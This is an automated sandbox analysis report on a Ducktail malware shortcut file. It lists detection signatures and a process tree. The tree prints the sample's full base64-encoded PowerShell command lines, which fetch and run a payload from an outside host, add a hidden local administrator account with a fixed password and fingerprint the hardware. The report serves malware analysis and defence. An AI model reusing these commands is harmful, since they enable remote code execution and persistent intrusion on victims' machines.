Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
eQwUFcwrXk.lnk

Overview

General Information

Sample name:eQwUFcwrXk.lnk
Analysis ID:1551875
MD5:16d399755e964c4538d17e4b30d73425
SHA1:198e642d29413557ae29704cf1fc95f182b56ffc
SHA256:d3aa737d9a25d1452772006ad3f67feded40fd052816274a17f37ac87ffb0b04
Infos:

Detection

Ducktail
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Windows shortcut file (LNK) starts blacklisted processes
Yara detected Ducktail
Allows multiple concurrent remote connection
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Modifies security policies related information
Obfuscated command line found
Potential dropper URLs found in powershell memory
PowerShell case anomaly found
Powershell drops PE file
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Reads the Security eventlog
Reads the System eventlog
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded IEX Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: PowerShell Base64 Encoded WMI Classes
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious New Service Creation
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Uses known network protocols on non-standard ports
Yara detected Obfuscated Powershell
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file contains strange resources
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64native
  • cmd.exe (PID: 8632 cmdline: "C:\Windows\system32\cmd.exe" /v /k "s^t^aRT /MI^N "" pOWe^Rs^heL^L -W hId^den -n^o^lOg^o -n^oP -E^P By^Pass -e^nc^oDE^D^cOm^m^a^n^d "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABJAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAHIAaQBuAGcAKAAoAEkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHAANABVADIAdABZAE4AZwA9AD0AIgApACkAKQApAC4AQwBPAG4AVABlAE4AdAApACkA"" && exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 8640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 8708 cmdline: pOWeRsheLL -W hIdden -nolOgo -noP -EP ByPass -encoDEDcOmmand "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABJAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAHIAaQBuAGcAKAAoAEkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHAANABVADIAdABZAE4AZwA9AD0AIgApACkAKQApAC4AQwBPAG4AVABlAE4AdAApACkA" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • csc.exe (PID: 8980 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\t1fagedb\t1fagedb.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
        • cvtres.exe (PID: 9000 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3C76.tmp" "c:\Users\user\AppData\Local\Temp\t1fagedb\CSC5EF4F498469D4A7EB6829710C89A123D.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
      • powershell.exe (PID: 9184 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 9192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • WINWORD.EXE (PID: 1068 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\AppData\Local\Temp\Meeting-Registration.pdf.docx" /o "" MD5: E7F3B8EA1B06F46176FC5C35307727D6)
      • cmd.exe (PID: 5204 cmdline: "C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8ANwAxAGIAYwBlADkAOQBiADcANQAwADIAYgAxADkAZgBmADIAYQAwADcAOQAwADUAYQBiADIAZAAxADMAMwA5AGMANwAwADkAZgBlAGIAYQAyADkAZAA3ADEAMQBiADMANABjAGQAZAA0ADkAYQAyADgAMQBlADMANQAzADMAMAA5ADYANAA0AGMANQAxADYAMwBhAGQAYwA2AGYAYgA0AGEAMwAxADUANAA4AGEAZQAwADMAYQBlADMAZQA5ADIANAAxADkANAAzADUAOAA4ADEAZQBlAGUAYgBlADcAZgA0AGEAZQAxAGMAMgA2ADIANgBhADMANABkADcAZQBjADIAZgBhADcAZQBiADgAOABiADYAYQBjAGEANwA3AGYAMAA4ADgAYwBkADQAZAA0ADkAYgAwADkANQAwADQANQBjADIAOAA1ADMANQBkAGYANwAwAGUANQBhAGIANQBkADAAYQAyAGIANQBiADAAYwA4AGEAZAAzAGUAOAAzAGIANgBjADgANgBiAGQAYQA5AGQANQBkADcAMgAwAGUAZgA1ADUAYgA1ADAAOQBkADQANwAzADQAYQAzADQAOABlACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQBBAHIAcgBhAHkALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAYgB5AHQAZQBBAHIAcgBhAHkAWwAkAGkAXQAgAD0AIAAkAGIAeQB0AGUAQQByAHIAYQB5AFsAJABpAF0AIAAtAGIAeABvAHIAIAAxADsAIAB9AA0ACgAJAAkASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAQQByAHIAYQB5ACkAKQA7AA0ACgAJAAkAYgByAGUAYQBrADsADQAKAAkAfQANAAoACQBjAGEAdABjAGgADQAKAAkAewANAAoACQAJAFMAZQBuAGQAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAOwANAAoACQAJACQAYwBvAHUAbgB0ACAALQA9ACAAMQA7AA0ACgAJAAkAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQA1ADsADQAKAAkAfQANAAoAfQANAAoADQAKAA0ACgA= MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • powershell.exe (PID: 5056 cmdline: powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8ANwAxAGIAYwBlADkAOQBiADcANQAwADIAYgAxADkAZgBmADIAYQAwADcAOQAwADUAYQBiADIAZAAxADMAMwA5AGMANwAwADkAZgBlAGIAYQAyADkAZAA3ADEAMQBiADMANABjAGQAZAA0ADkAYQAyADgAMQBlADMANQAzADMAMAA5ADYANAA0AGMANQAxADYAMwBhAGQAYwA2AGYAYgA0AGEAMwAxADUANAA4AGEAZQAwADMAYQBlADMAZQA5ADIANAAxADkANAAzADUAOAA4ADEAZQBlAGUAYgBlADcAZgA0AGEAZQAxAGMAMgA2ADIANgBhADMANABkADcAZQBjADIAZgBhADcAZQBiADgAOABiADYAYQBjAGEANwA3AGYAMAA4ADgAYwBkADQAZAA0ADkAYgAwADkANQAwADQANQBjADIAOAA1ADMANQBkAGYANwAwAGUANQBhAGIANQBkADAAYQAyAGIANQBiADAAYwA4AGEAZAAzAGUAOAAzAGIANgBjADgANgBiAGQAYQA5AGQANQBkADcAMgAwAGUAZgA1ADUAYgA1ADAAOQBkADQANwAzADQAYQAzADQAOABlACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQBBAHIAcgBhAHkALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAYgB5AHQAZQBBAHIAcgBhAHkAWwAkAGkAXQAgAD0AIAAkAGIAeQB0AGUAQQByAHIAYQB5AFsAJABpAF0AIAAtAGIAeABvAHIAIAAxADsAIAB9AA0ACgAJAAkASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAQQByAHIAYQB5ACkAKQA7AA0ACgAJAAkAYgByAGUAYQBrADsADQAKAAkAfQANAAoACQBjAGEAdABjAGgADQAKAAkAewANAAoACQAJAFMAZQBuAGQAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAOwANAAoACQAJACQAYwBvAHUAbgB0ACAALQA9ACAAMQA7AA0ACgAJAAkAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQA1ADsADQAKAAkAfQANAAoAfQANAAoADQAKAA0ACgA= MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 4072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
          • WmiPrvSE.exe (PID: 4732 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
  • sppsvc.exe (PID: 9164 cmdline: C:\Windows\system32\sppsvc.exe MD5: 30C7EF47B57367CC546173BB4BB2BB04)
  • svczHost.exe (PID: 4540 cmdline: C:\Windows\Temp\svczHost.exe cakoi10 uyt1n8ded9fb380.com MD5: EB57894A8FF610DF55C97E427D0DDD7B)
    • conhost.exe (PID: 4016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 9192 cmdline: "cmd.exe" /c del /q "C:\Windows \System32\*" & rmdir "C:\Windows \System32" & rmdir "C:\Windows \" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • cmd.exe (PID: 8244 cmdline: "cmd.exe" /c sc query myRdpService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • sc.exe (PID: 1708 cmdline: sc query myRdpService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • powershell.exe (PID: 9184 cmdline: "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 4080 cmdline: "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA= MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
